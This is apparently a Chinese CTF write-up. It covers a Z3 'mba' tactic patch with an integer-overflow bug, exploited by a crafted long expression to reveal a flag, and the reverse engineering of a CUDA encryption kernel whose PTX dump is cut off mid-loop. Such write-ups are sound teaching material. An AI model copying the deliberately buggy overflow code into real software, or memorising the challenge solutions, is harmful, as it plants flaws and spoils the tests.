    z3.Tactic('mba'),
    z3.Tactic('simplify'),
    z3.Tactic('smt')
  )

  if check_expression(t, mba):
    print("It works!")
  else:
    print(f"Flag: {FLAG}")
  return 

if __name__ == '__main__':
  serve_challenge()

new-tactic.patch

diff --git a/src/tactic/bv/CMakeLists.txt b/src/tactic/bv/CMakeLists.txt
index 9009e6fa5..72bd2cfa1 100644
--- a/src/tactic/bv/CMakeLists.txt
+++ b/src/tactic/bv/CMakeLists.txt
@@ -10,6 +10,7 @@ z3_add_component(bv_tactics
     bv_size_reduction_tactic.cpp
     dt2bv_tactic.cpp
     elim_small_bv_tactic.cpp
+    mba_tactic.cpp
   COMPONENT_DEPENDENCIES
     bit_blaster
     core_tactics
@@ -25,4 +26,5 @@ z3_add_component(bv_tactics
     dt2bv_tactic.h
     elim_small_bv_tactic.h
     max_bv_sharing_tactic.h
+    mba_tactic.h
 )
diff --git a/src/tactic/bv/mba_tactic.cpp b/src/tactic/bv/mba_tactic.cpp
new file mode 100644
index 000000000..f3796c1e7
--- /dev/null
+++ b/src/tactic/bv/mba_tactic.cpp
@@ -0,0 +1,381 @@
+#include "tactic/tactic.h"
+#include "tactic/tactical.h"
+#include "tactic/bv/mba_tactic.h"
+#include "ast/bv_decl_plugin.h"
+
+#include <tuple>
+#include <vector>
+
+
+namespace {
+
+const size_t kBVSize = 64;
+
+int basis[][4] = {
+  {0, 0, 0, 0},
+  {-1, -1, 1, 1},
+  {0, 1, -1, 0},
+  {-1, 0, 0, 1},
+  {1, 0, -1, 0},
+  {0, -1, 0, 1},
+  {1, 1, -2, 0},
+  {0, 0, -1, 1},
+  {0, 0, 1, 0},
+  {-1, -1, 2, 1},
+  {0, 1, 0, 0},
+  {-1, 0, 1, 1},
+  {1, 0, 0, 0},
+  {0, -1, 1, 1},
+  {1, 1, -1, 0},
+  {0, 0, 0, 1}
+};
+
+struct bool_function {
+  using boolvar = std::tuple<bool, char>;
+  expr_ref e;
+  char op;
+  std::vector<boolvar> vars;
+  bool negated;
+
+  bool_function(ast_manager & m, expr * e) : e(e, m), op(0), negated(false) { }
+
+  bool evaluate(bool x, bool y) {
+    auto eval_var = [&](const boolvar & v) {
+      bool neg; char name;
+      std::tie(neg, name) = v;
+      return neg ? !((name == 'x' ? x : y)) : (name == 'x' ? x : y);
+    };
+
+    bool result;
+    switch (op) {
+    case '&': result = eval_var(vars[0]) && eval_var(vars[1]); break;
+    case '|': result = eval_var(vars[0]) || eval_var(vars[1]); break;
+    case '^': result = eval_var(vars[0]) ^ eval_var(vars[1]); break;
+    default: result = eval_var(vars[0]); break;
+    }
+    return negated ? !result : result;
+  }
+
+  int truth_value(void) {
+    int result = 0;
+    for (size_t i = 0; i < 4; i++) {
+      bool x = i & 2;
+      bool y = i & 1;
+      if (evaluate(x, y))
+        result |= 1 << i;
+    }
+    return result;
+  }
+};
+
+
+using coeff_type = long long;
+using mba_term = std::tuple<coeff_type, bool_function>;
+
+
+struct mba_expr {
+  std::vector<mba_term> terms;
+  ast_manager & m;
+
+  mba_expr(ast_manager & m) : m(m) { }
+};
+
+class mba_tactic : public tactic {
+  ast_manager & m_manager;
+  bv_util m_bv_util;
+  params_ref m_params;
+
+  ast_manager & m() const { return m_manager; }
+
+  bv_util & bv() { return m_bv_util; }
+
+  coeff_type get_coeff(expr * e) {
+    rational r;
+    if (!bv().is_numeral(e, r))
+      throw tactic_exception("expected numeral");
+    
+    if (r.is_int64())
+      return r.get_int64();
+    else if (r.is_int32())
+      return r.get_int32();
+    else if (r.is_uint64()) {
+      return r.get_uint64();
+    }
+    throw tactic_exception("expected int64");
+  }
+
+  bool is_indeterminate(expr * e) {
+    if (!is_app(e))
+      return false;
+
+    app * a = to_app(e);
+    if (a->get_num_args() != 0)
+      return false;
+
+    sort * s = a->get_decl()->get_range();
+    if (!bv().is_bv_sort(s))
+      return false;
+
+    unsigned bv_size = s->get_parameter(0).get_int();
+    if (bv_size != kBVSize)
+      return false;
+
+    func_decl * f = a->get_decl();
+    if (f->get_name() == "x" || f->get_name() == "y")
+      return true;
+    return false;
+  }
+
+  expr * mk_indeterminate(const char* name) {
+    return m().mk_const(name, bv().mk_sort(kBVSize));
+  }
+
+  expr * mk_numeral(int64_t u) {
+    return bv().mk_numeral(u, kBVSize);
+  }
+
+  bool build_bool_function_terms(app * a, bool_function & bf) {
+    unsigned num_args = a->get_num_args();
+    if (num_args > 2) {
+      return false;
+    }
+
+    for (unsigned i = 0; i < num_args; i++) {
+      expr * arg = a->get_arg(i);
+      if (!is_app(arg)) {
+        return false;
+      }
+      app * arg_app = to_app(arg);
+
+      if (bv().is_bv_not(arg_app)) {
+        expr * indet = arg_app->get_arg(0);
+        if (!is_indeterminate(indet)) {
+          return false;
+        }
+        char name = to_app(indet)->get_decl()->get_name().str()[0];
+        bf.vars.push_back(std::make_tuple(true, name));
+      } else if (is_indeterminate(arg_app)) {
+        char name = arg_app->get_decl()->get_name().str()[0];
+        bf.vars.push_back(std::make_tuple(false, name));
+      } else {
+        TRACE("mba", tout << "not an indeterminate\n";);
+        return false;
+      }
+    }
+    return true;
+  }
+
+  bool build_bool_function(expr * e, bool_function & bf) {
+    if (!is_app(e))
+      return false;
+
+    app * a = to_app(e);
+    if (bv().is_bv_not(a)) {
+      bf.negated = !bf.negated;
+      return build_bool_function(a->get_arg(0), bf);
+    } else if (bv().is_bv_and(a)) {
+      bf.op = '&';
+      return build_bool_function_terms(a, bf);
+    } else if (bv().is_bv_or(a)) {
+      bf.op = '|';
+      return build_bool_function_terms(a, bf);
+    } else if (bv().is_bv_xor(a)) {
+      bf.op = '^';
+      return build_bool_function_terms(a, bf);
+    }
+
+    if (!is_indeterminate(a))
+      return false;
+
+    char name = a->get_decl()->get_name().str()[0];
+    bf.vars.push_back(std::make_tuple(false, name));
+    return true;
+  }
+
+  bool build_mba_expr(expr * e, mba_expr & mba, bool negative) {
+    if (!is_app(e))
+      return false;
+
+    app * a = to_app(e);
+    if (bv().is_bv_add(a)) {
+      unsigned num_args = a->get_num_args();
+      
+      if (num_args != 2)
+        return false;
+
+      expr * arg1 = a->get_arg(0);
+      expr * arg2 = a->get_arg(1);
+
+      if (!build_mba_expr(arg1, mba, negative))
+        return false;
+      if (!build_mba_expr(arg2, mba, negative))
+        return false;
+      return true;
+    } else if (bv().is_bv_sub(a)) {
+      unsigned num_args = a->get_num_args();
+      if (num_args != 2)
+        return false;
+
+      expr * arg1 = a->get_arg(0);
+      expr * arg2 = a->get_arg(1);
+
+      if (!build_mba_expr(arg1, mba, negative))
+        return false;
+      if (!build_mba_expr(arg2, mba, !negative))
+        return false;
+      return true;
+    } else if (bv().is_bv_mul(a)) {
+      if (a->get_num_args() != 2)
+        return false;
+
+      expr * coef = a->get_arg(0);
+      expr * term = a->get_arg(1);
+      if (!bv().is_numeral(coef))
+        return false;
+
+      bool_function bf(m(), term);
+      if (!build_bool_function(term, bf))
+        return false;
+
+      coeff_type c = get_coeff(coef);
+      if (negative)
+        c = -c;
+      mba.terms.push_back(std::make_tuple(c, bf));
+      return true;
+    } else if (bv().is_numeral(a)) {
+      expr * indet = mk_indeterminate("x");
+      expr * term = bv().mk_bv_not(bv().mk_bv_and(indet,bv().mk_bv_not(indet)));
+
+      bool_function bf(m(), term);
+      if (!build_bool_function(term, bf))
+        return false;
+
+      coeff_type c = get_coeff(a);
+      if (negative)
+        c = -c;
+      mba.terms.push_back(std::make_tuple(-c, bf));
+      return true;
+    }
+
+    // probably a bool function
+    bool_function bf(m(), e);
+    if (!build_bool_function(e, bf))
+      return false;
+
+    coeff_type c = negative ? -1 : 1;
+    mba.terms.push_back(std::make_tuple(c, bf));
+    return true;
+  }
+
+  expr * mk_expressiion(int * basis) {
+    expr * x = mk_indeterminate("x");
+    expr * y = mk_indeterminate("y");
+    expr * x_and_y = bv().mk_bv_and(x, y);
+    expr * one = mk_numeral(-1ull);
+    expr * basis_expr[] = { x, y, x_and_y, one };
+
+    expr * result = nullptr;
+    for (size_t i = 0; i < 4; i++) {
+      if (basis[i] == 0)
+        continue;
+
+      expr * coterm = bv().mk_bv_mul(
+        mk_numeral(basis[i]),
+        basis_expr[i]
+      );
+      if (!result)
+        result = coterm;
+      else
+        result = bv().mk_bv_add(result, coterm);
+    }
+    return result;
+  }
+
+  expr * construct_simplified_mba(expr * e) {
+    mba_expr mba(m());
+
+    if (!build_mba_expr(e, mba, false))
+      return nullptr;
+
+    int basis_comb[4] = {0, 0, 0, 0};
+    for (size_t i = 0; i < mba.terms.size(); i++) {
+      int truth_value = std::get<1>(mba.terms[i]).truth_value();
+      coeff_type coeff = std::get<0>(mba.terms[i]);
+      for (size_t j = 0; j < 4; j++) {
+        basis_comb[j] += basis[truth_value][j] * coeff;
+      }
+    }
+    return mk_expressiion(basis_comb);
+  }
+
+  bool simplify_form(expr * e, expr_ref & result) {
+    if (!is_app(e))
+      return false;
+
+    app * a = to_app(e);
+    
+    if (m().is_eq(a) || m().is_distinct(a)) {
+      SASSERT(a->get_num_args() == 2);
+      expr * lhs = a->get_arg(0);
+      expr * rhs = a->get_arg(1);
+      expr * simplified = construct_simplified_mba(lhs);
+      
+      if (simplified) {
+        if (m().is_eq(a))
+          result = m().mk_eq(simplified, rhs);
+        else {
+          expr * args[] = { simplified, rhs };
+          result = m().mk_distinct(2, args);
+        }
+        return true;
+      }
+    }
+    return false;
+  }
+
+  void simplify_goal(goal & g) {
+    if (g.inconsistent())
+      return;
+    if (g.proofs_enabled()) {
+      return; // not supported
+    }
+
+    expr_ref new_curr(m());
+    proof_ref new_pr(m());
+    unsigned size = g.size();
+    for(unsigned idx = 0; idx < size; idx++) {
+      if (g.inconsistent()) {
+        break;
+      }
+      expr * curr = g.form(idx);
+      if (simplify_form(curr, new_curr)) {
+        g.update(idx, new_curr, new_pr, g.dep(idx));
+      }
+    }
+  }
+
+public:
+  mba_tactic(ast_manager & m, params_ref const & p) : m_manager(m), m_bv_util(m), m_params(p) { }
+
+  void collect_statistics(statistics & st) const override { }
+
+  void operator()(goal_ref const & in, goal_ref_buffer & result) override {
+    TRACE("mba", tout << "mba tactic\n";);
+    simplify_goal(*in.get());
+    in->inc_depth();
+    result.push_back(in.get());
+  }
+  
+  void cleanup() override { }
+
+  tactic * translate(ast_manager & m) override { return alloc(mba_tactic, m, m_params); }
+
+  const char* name() const override { return "mba"; }
+};
+
+} // namespace
+
+tactic * mk_mba_tactic(ast_manager & m, params_ref const & p) {
+  return clean(alloc(mba_tactic, m, p));
+}
+
diff --git a/src/tactic/bv/mba_tactic.h b/src/tactic/bv/mba_tactic.h
new file mode 100644
index 000000000..b779cdc2b
--- /dev/null
+++ b/src/tactic/bv/mba_tactic.h
@@ -0,0 +1,12 @@
+#pragma once
+
+#include "util/params.h"
+
+class ast_manager;
+class tactic;
+
+tactic * mk_mba_tactic(ast_manager & m, params_ref const & p = params_ref());
+
+/*
+    ADD_TACTIC("mba", "Toy MBA simplifier", "mk_mba_tactic(m, p)")
+*/
\ No newline at end of file

先看server.py,大概意思就是要求输入的mba表达式满足以下条件:

  1. 数字不超过8位
  2. 表达式长度不超过200个字符
  3. 表达式项数不超过15
  4. 这个表达式不能等于自己

再来看patch,直接丢给ds它就会告诉你这里面有个数据溢出的漏洞,用int类型存储了long long类型数据的计算结果

image-20250224125232910

image-20250224125342887

因此我们构造一个足够大且满足条件的mba表达式使其溢出,即可导致expr!=expr:

99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)

image-20250224125715683

RE

easy-cuda-rev

载入ida之后对主程序进行分析,主逻辑还是比较清晰明了的

image-20250224153149480

该程序实现的就是对flag文件进行的加密操作,追踪cuda_encrypto函数即可,由于是cuda编写的,我们追踪一下注册函数的api

image-20250224153157727

即会发现加密的主要逻辑应该是存储在下图位置,参考文章https://bbs.kanxue.com/thread-275989.htm

image-20250224153201013

然后使用工具将ptx汇编dump下来

image-20250224153140141

Fatbin elf code:
================
arch = sm_52
code version = [1,7]
host = linux
compile_size = 64bit

Fatbin elf code:
================
arch = sm_52
code version = [1,7]
host = linux
compile_size = 64bit

Fatbin ptx code:
================
arch = sm_52
code version = [8,0]
host = linux
compile_size = 64bit
compressed








.version 8.0
.target sm_52
.address_size 64


.extern .func (.param .b32 func_retval0) vprintf
(
.param .b64 vprintf_param_0,
.param .b64 vprintf_param_1
)
;
.const .align 1 .b8 T[256] = {99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171, 118, 202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21, 4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39, 178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179, 41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57, 74, 76, 88, 207, 208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16, 255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, 144, 136, 70, 238, 184, 20, 222, 94, 11, 219, 224, 50, 58, 10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121, 231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198, 232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158, 225, 248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206, 85, 40, 223, 140, 161, 137, 13, 191, 230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22};
.const .align 1 .b8 RT[256] = {82, 9, 106, 213, 48, 54, 165, 56, 191, 64, 163, 158, 129, 243, 215, 251, 124, 227, 57, 130, 155, 47, 255, 135, 52, 142, 67, 68, 196, 222, 233, 203, 84, 123, 148, 50, 166, 194, 35, 61, 238, 76, 149, 11, 66, 250, 195, 78, 8, 46, 161, 102, 40, 217, 36, 178, 118, 91, 162, 73, 109, 139, 209, 37, 114, 248, 246, 100, 134, 104, 152, 22, 212, 164, 92, 204, 93, 101, 182, 146, 108, 112, 72, 80, 253, 237, 185, 218, 94, 21, 70, 87, 167, 141, 157, 132, 144, 216, 171, 0, 140, 188, 211, 10, 247, 228, 88, 5, 184, 179, 69, 6, 208, 44, 30, 143, 202, 63, 15, 2, 193, 175, 189, 3, 1, 19, 138, 107, 58, 145, 17, 65, 79, 103, 220, 234, 151, 242, 207, 206, 240, 180, 230, 115, 150, 172, 116, 34, 231, 173, 53, 133, 226, 249, 55, 232, 28, 117, 223, 110, 71, 241, 26, 113, 29, 41, 197, 137, 111, 183, 98, 14, 170, 24, 190, 27, 252, 86, 62, 75, 198, 210, 121, 32, 154, 219, 192, 254, 120, 205, 90, 244, 31, 221, 168, 51, 136, 7, 199, 49, 177, 18, 16, 89, 39, 128, 236, 95, 96, 81, 127, 169, 25, 181, 74, 13, 45, 229, 122, 159, 147, 201, 156, 239, 160, 224, 59, 77, 174, 42, 245, 176, 200, 235, 187, 60, 131, 83, 153, 97, 23, 43, 4, 126, 186, 119, 214, 38, 225, 105, 20, 99, 85, 33, 12, 125};
.global .align 1 .b8 $str[8] = {103, 105, 102, 116, 49, 58, 10, 0};
.global .align 1 .b8 $str$1[6] = {37, 48, 50, 120, 32, 0};
.global .align 1 .b8 $str$2[2] = {10, 0};
.global .align 1 .b8 $str$3[8] = {103, 105, 102, 116, 50, 58, 10, 0};
.global .align 1 .b8 $str$4[8] = {103, 105, 102, 116, 51, 58, 10, 0};
.global .align 1 .b8 $str$5[8] = {103, 105, 102, 116, 52, 58, 10, 0};
.global .align 1 .b8 $str$6[8] = {103, 105, 102, 116, 53, 58, 10, 0};

.visible .entry _Z14encrypt_kernelPhh(
.param .u64 _Z14encrypt_kernelPhh_param_0,
.param .u8 _Z14encrypt_kernelPhh_param_1
)
{
.local .align 8 .b8 __local_depot0[8];
.reg .b64 %SP;
.reg .b64 %SPL;
.reg .pred %p<41>;
.reg .b16 %rs<62>;
.reg .b32 %r<265>;
.reg .b64 %rd<103>;


mov.u64 %SPL, __local_depot0;
cvta.local.u64 %SP, %SPL;
ld.param.u8 %rs12, [_Z14encrypt_kernelPhh_param_1];
ld.param.u64 %rd19, [_Z14encrypt_kernelPhh_param_0];
cvta.to.global.u64 %rd1, %rd19;
add.u64 %rd20, %SP, 0;
add.u64 %rd2, %SPL, 0;
mov.u32 %r1, %ntid.x;
mov.u32 %r54, %ctaid.x;
mul.lo.s32 %r2, %r54, %r1;
mov.u32 %r3, %tid.x;
add.s32 %r4, %r2, %r3;
setp.ge.u32 %p1, %r3, %r1;
cvt.s64.s32 %rd21, %r4;
add.s64 %rd3, %rd1, %rd21;
@%p1 bra $L__BB0_12;

ld.global.u8 %rs13, [%rd3];
cvt.u16.u32 %rs14, %r4;
mul.lo.s16 %rs15, %rs14, 73;
add.s16 %rs16, %rs15, %rs12;
xor.b16 %rs17, %rs13, %rs16;
and.b16 %rs18, %rs17, 240;
shr.u16 %rs19, %rs18, 4;
shl.b16 %rs20, %rs17, 4;
or.b16 %rs58, %rs19, %rs20;
mov.u32 %r242, 0;
mov.u64 %rd24, T;

$L__BB0_2:
cvt.u64.u16 %rd22, %rs58;
and.b64 %rd23, %rd22, 255;
add.s64 %rd25, %rd24, %rd23;
ld.const.u8 %rs21, [%rd25];
shr.u16 %rs22, %rs21, 4;
shl.b16 %rs23, %rs21, 4;
or.b16 %rs24, %rs22, %rs23;
cvt.u16.u32 %rs25, %r242;
xor.b16 %rs58, %rs24, %rs25;
add.s32 %r242, %r242, 1;
setp.lt.u32 %p2, %r242, 10485760;
@%p2 bra $L__BB0_2;

mov.u32 %r243, 0;

$L__BB0_4:
cvt.u64.u16 %rd26, %rs58;
and.b64 %rd27, %rd26, 255;
add.s64 %rd29, %rd24, %rd27;
ld.const.u8 %rs26, [%rd29];
shr.u16 %rs27, %rs26, 4;
shl.b16 %rs28, %rs26, 4;
or.b16 %rs29, %rs27, %rs28;
cvt.u16.u32 %rs30, %r243;
xor.b16 %rs58, %rs29, %rs30;
add.s32 %r243, %r243, 1;
setp.lt.u32 %p3, %r243, 10485760;
@%p3 bra $L__BB0_4;

mov.u32 %r244, 0;

$L__BB0_6:
cvt.u64.u16 %rd30, %rs58;
and.b64 %rd31, %rd30, 255;
add.s64 %rd33, %rd24, %rd31;
ld.const.u8 %rs31, [%rd33];
shr.u16 %rs32, %rs31, 4;
shl.b16 %rs33, %rs31, 4;
or.b16 %rs34, %rs32, %rs33;
cvt.u16.u32 %rs35, %r244;
xor.b16 %rs58, %rs34, %rs35;
add.s32 %r244, %r244, 1;
setp.lt.u32 %p4, %r244, 10485760;
@%p4 bra $L__BB0_6;

mov.u32 %r245, 0;

$L__BB0_8:
cvt.u64.u16 %rd34, %rs58;
and.b64 %rd35, %rd34, 255;
add.s64 %rd37, %rd24, %rd35;
ld.const.u8 %rs36, [%rd37];
shr.u16 %rs37, %rs36, 4;
shl.b16 %rs38, %rs36, 4;
or.b16 %rs39, %rs37, %rs38;
cvt.u16.u32 %rs40, %r245;
xor.b16 %rs58, %rs39, %rs40;
add.s32 %r245, %r245, 1;
setp.lt.u32 %p5, %r245, 10485760;
@%p5 bra $L__BB0_8;

mov.u32 %r246, 0;

$L__BB0_10:
cvt.u64.u16 %rd38, %rs58;
and.b64 %rd39, %rd38, 255;
add.s64 %rd41, %rd24, %rd39;
ld.const.u8 %rs41, [%rd41];
shr.u16 %rs42, %rs41, 4;
shl.b16 %rs43, %rs41, 4;
or.b16 %rs44, %rs42, %rs43;
cvt.u16.u32 %rs45, %r246;
xor.b16 %rs58, %rs44, %rs45;
add.s32 %r246, %r246, 1;
setp.lt.u32 %p6, %r246, 10485760;
@%p6 bra $L__BB0_10;

st.global.u8 [%rd3], %rs58;

$L__BB0_12:
bar.sync 0;
setp.ne.s32 %p7, %r4, 0;
@%p7 bra $L__BB0_17;

mov.u64 %rd42, $str;
cvta.global.u64 %rd43, %rd42;
mov.u64 %rd44, 0;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd43;
.param .b64 param1;
st.param.b64 [param1+0], %rd44;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r60, [retval0+0];
}
        setp.eq.s32 %p8, %r1, 0;
@%p8 bra $L__BB0_16;

mov.u32 %r247, 0;
mov.u64 %rd45, $str$1;
cvta.global.u64 %rd46, %rd45;
mov.u64 %rd97, %rd1;

$L__BB0_15:
ld.global.u8 %r62, [%rd97];
st.local.u32 [%rd2], %r62;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd46;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r63, [retval0+0];
}
        add.s64 %rd97, %rd97, 1;
add.s32 %r247, %r247, 1;
setp.lt.u32 %p9, %r247, %r1;
@%p9 bra $L__BB0_15;

$L__BB0_16:
mov.u64 %rd48, $str$2;
cvta.global.u64 %rd49, %rd48;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd49;
.param .b64 param1;
st.param.b64 [param1+0], %rd44;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r64, [retval0+0];
}

$L__BB0_17:
bar.sync 0;
setp.eq.s32 %p10, %r1, 0;
setp.ne.s32 %p11, %r3, 0;
or.pred %p12, %p11, %p10;
@%p12 bra $L__BB0_20;

cvt.s64.s32 %rd51, %r2;
add.s64 %rd98, %rd1, %rd51;
mov.u32 %r248, 0;

$L__BB0_19:
add.s32 %r248, %r248, 1;
rem.u32 %r66, %r248, %r1;
add.s32 %r67, %r66, %r2;
cvt.s64.s32 %rd52, %r67;
add.s64 %rd53, %rd1, %rd52;
ld.global.u8 %rs46, [%rd98];
xor.b16 %rs47, %rs46, %rs12;
ld.global.u8 %rs48, [%rd53];
xor.b16 %rs49, %rs47, %rs48;
st.global.u8 [%rd98], %rs49;
add.s64 %rd98, %rd98, 1;
setp.lt.u32 %p13, %r248, %r1;
@%p13 bra $L__BB0_19;

$L__BB0_20:
bar.sync 0;
@%p7 bra $L__BB0_25;

mov.u64 %rd54, $str$3;
cvta.global.u64 %rd55, %rd54;
mov.u64 %rd56, 0;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd55;
.param .b64 param1;
st.param.b64 [param1+0], %rd56;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r68, [retval0+0];
}
        @%p10 bra $L__BB0_24;

mov.u32 %r249, 0;
mov.u64 %rd57, $str$1;
cvta.global.u64 %rd58, %rd57;
mov.u64 %rd99, %rd1;

$L__BB0_23:
ld.global.u8 %r70, [%rd99];
st.local.u32 [%rd2], %r70;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd58;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r71, [retval0+0];
}
        add.s64 %rd99, %rd99, 1;
add.s32 %r249, %r249, 1;
setp.lt.u32 %p16, %r249, %r1;
@%p16 bra $L__BB0_23;

$L__BB0_24:
mov.u64 %rd60, $str$2;
cvta.global.u64 %rd61, %rd60;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd61;
.param .b64 param1;
st.param.b64 [param1+0], %rd56;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r72, [retval0+0];
}

$L__BB0_25:
bar.sync 0;
and.b32 %r73, %r3, 1;
setp.eq.b32 %p18, %r73, 1;
add.s32 %r74, %r3, 1;
rem.u32 %r75, %r74, %r1;
add.s32 %r76, %r75, %r2;
cvt.s64.s32 %rd63, %r76;
add.s64 %rd11, %rd1, %rd63;
or.pred %p19, %p1, %p18;
@%p19 bra $L__BB0_27;

ld.global.u8 %rs50, [%rd3];
ld.global.u8 %rs51, [%rd11];
st.global.u8 [%rd3], %rs51;
st.global.u8 [%rd11], %rs50;

$L__BB0_27:
bar.sync 0;
@%p7 bra $L__BB0_32;

mov.u64 %rd64, $str$4;
cvta.global.u64 %rd65, %rd64;
mov.u64 %rd66, 0;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd65;
.param .b64 param1;
st.param.b64 [param1+0], %rd66;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r77, [retval0+0];
}
        @%p10 bra $L__BB0_31;

mov.u32 %r250, 0;
mov.u64 %rd67, $str$1;
cvta.global.u64 %rd68, %rd67;
mov.u64 %rd100, %rd1;

$L__BB0_30:
ld.global.u8 %r79, [%rd100];
st.local.u32 [%rd2], %r79;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd68;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r80, [retval0+0];
}
        add.s64 %rd100, %rd100, 1;
add.s32 %r250, %r250, 1;
setp.lt.u32 %p22, %r250, %r1;
@%p22 bra $L__BB0_30;

$L__BB0_31:
mov.u64 %rd70, $str$2;
cvta.global.u64 %rd71, %rd70;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd71;
.param .b64 param1;
st.param.b64 [param1+0], %rd66;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r81, [retval0+0];
}

$L__BB0_32:
bar.sync 0;
setp.lt.s32 %p24, %r3, 1;
or.pred %p25, %p24, %p1;
shr.u32 %r82, %r3, 31;
add.s32 %r83, %r3, %r82;
and.b32 %r84, %r83, -2;
sub.s32 %r85, %r3, %r84;
setp.ne.s32 %p26, %r85, 1;
or.pred %p27, %p25, %p26;
@%p27 bra $L__BB0_34;

ld.global.u8 %rs52, [%rd3];
ld.global.u8 %rs53, [%rd11];
st.global.u8 [%rd3], %rs53;
st.global.u8 [%rd11], %rs52;

$L__BB0_34:
bar.sync 0;
@%p7 bra $L__BB0_39;

mov.u64 %rd73, $str$5;
cvta.global.u64 %rd74, %rd73;
mov.u64 %rd75, 0;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd74;
.param .b64 param1;
st.param.b64 [param1+0], %rd75;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r86, [retval0+0];
}
        @%p10 bra $L__BB0_38;

mov.u32 %r251, 0;
mov.u64 %rd76, $str$1;
cvta.global.u64 %rd77, %rd76;
mov.u64 %rd101, %rd1;

$L__BB0_37:
ld.global.u8 %r88, [%rd101];
st.local.u32 [%rd2], %r88;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd77;
.param .b64 param1;
st.param.b64 [param1+0], %rd20;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r89, [retval0+0];
}
        add.s64 %rd101, %rd101, 1;
add.s32 %r251, %r251, 1;
setp.lt.u32 %p30, %r251, %r1;
@%p30 bra $L__BB0_37;

$L__BB0_38:
mov.u64 %rd79, $str$2;
cvta.global.u64 %rd80, %rd79;
{
        .reg .b32 temp_param_reg;
.param .b64 param0;
st.param.b64 [param0+0], %rd80;
.param .b64 param1;
st.param.b64 [param1+0], %rd75;
.param .b32 retval0;
call.uni (retval0),
vprintf,
(
param0,
param1
);
ld.param.b32 %r90, [retval0+0];
}

$L__BB0_39:
bar.sync 0;
and.b32 %r91, %r3, 7;
setp.ne.s32 %p32, %r91, 0;
or.pred %p33, %p1, %p32;
@%p33 bra $L__BB0_43;

ld.global.u32 %r259, [%rd3+4];
ld.global.u32 %r260, [%rd3];
mov.u32 %r258, 0;
mov.u32 %r257, -239350328;
mov.u32 %r256, 387276957;
mov.u32 %r255, 2027808484;
mov.u32 %r254, -626627285;
mov.u32 %r253, 1013904242;
mov.u32 %r252, -1640531527;

$L__BB0_41:
shl.b32 %r99, %r259, 4;
add.s32 %r100, %r99, -1556008596;
shr.u32 %r101, %r259, 5;
add.s32 %r102, %r101, -939442524;
xor.b32 %r103, %r102, %r100;
add.s32 %r104, %r252, %r259;
xor.b32 %r105, %r103, %r104;
add.s32 %r106, %r105, %r260;
shl.b32 %r107, %r106, 4;
add.s32 %r108, %r107, 1013904242;
add.s32 %r109, %r106, %r252;
xor.b32 %r110, %r108, %r109;
shr.u32 %r111, %r106, 5;
add.s32 %r112, %r111, 338241895;
xor.b32 %r113, %r110, %r112;
add.s32 %r114, %r113, %r259;
shl.b32 %r115, %r114, 4;
add.s32 %r116, %r115, -1556008596;
add.s32 %r117, %r253, %r114;
shr.u32 %r118, %r114, 5;
add.s32 %r119, %r118, -939442524;
xor.b32 %r120, %r119, %r116;
xor.b32 %r121, %r120, %r117;
add.s32 %r122, %r121, %r106;
shl.b32 %r123, %r122, 4;
add.s32 %r124, %r123, 1013904242;
add.s32 %r125, %r122, %r253;
